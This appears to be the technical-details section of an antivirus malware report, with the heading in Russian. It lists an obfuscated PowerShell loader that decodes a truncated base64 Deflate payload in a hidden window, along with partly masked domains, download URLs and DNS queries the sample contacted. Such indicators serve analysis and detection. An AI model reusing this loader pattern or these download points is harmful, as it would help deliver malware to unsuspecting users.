Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-OBjEct SySTEm.IO.comPreSSioN.DEFLaTeStrEaM( [SystEM.iO.MEmoryStReam] [COnvErT]::fROmBASe64STRINg( 'VZBda8IwFIb/Si8CUZwJ+0CYoSBz7AO26SYoG7tJ4plNlyY1PTOzxf8+26t5cy7e9+GB95CPpzp1EIde5aAxeQFkK...
- 'al####ronz.com.tr':80
- 'al####ronz.com.tr':443
- 'em##cal.com':80
- 'em##cal.com':443
- 'mo####obilyam.com':80
- http://www.al####ronz.com.tr/BCsOo/
- http://www.em##cal.com/P6a21IM/
- http://www.mo####obilyam.com/VQjlVqVt/
- http://mo####obilyam.com/VQjlVqVt/
- 'al####ronz.com.tr':443
- 'em##cal.com':443
- DNS ASK ag##s.org
- DNS ASK al####ronz.com.tr
- DNS ASK em##cal.com
- DNS ASK tr###lution.id
- DNS ASK mo####obilyam.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-OBjEct SySTEm.IO.comPreSSioN.DEFLaTeStrEaM( [SystEM.iO.MEmoryStReam] [COnvErT]::fROmBASe64STRINg( 'VZBda8IwFIb/Si8CUZwJ+0CYoSBz7AO26SYoG7tJ4plNlyY1PTOzxf8+26t5cy7e9+GB95CPpzp1EIde5aAxeQFkK...' (со скрытым окном)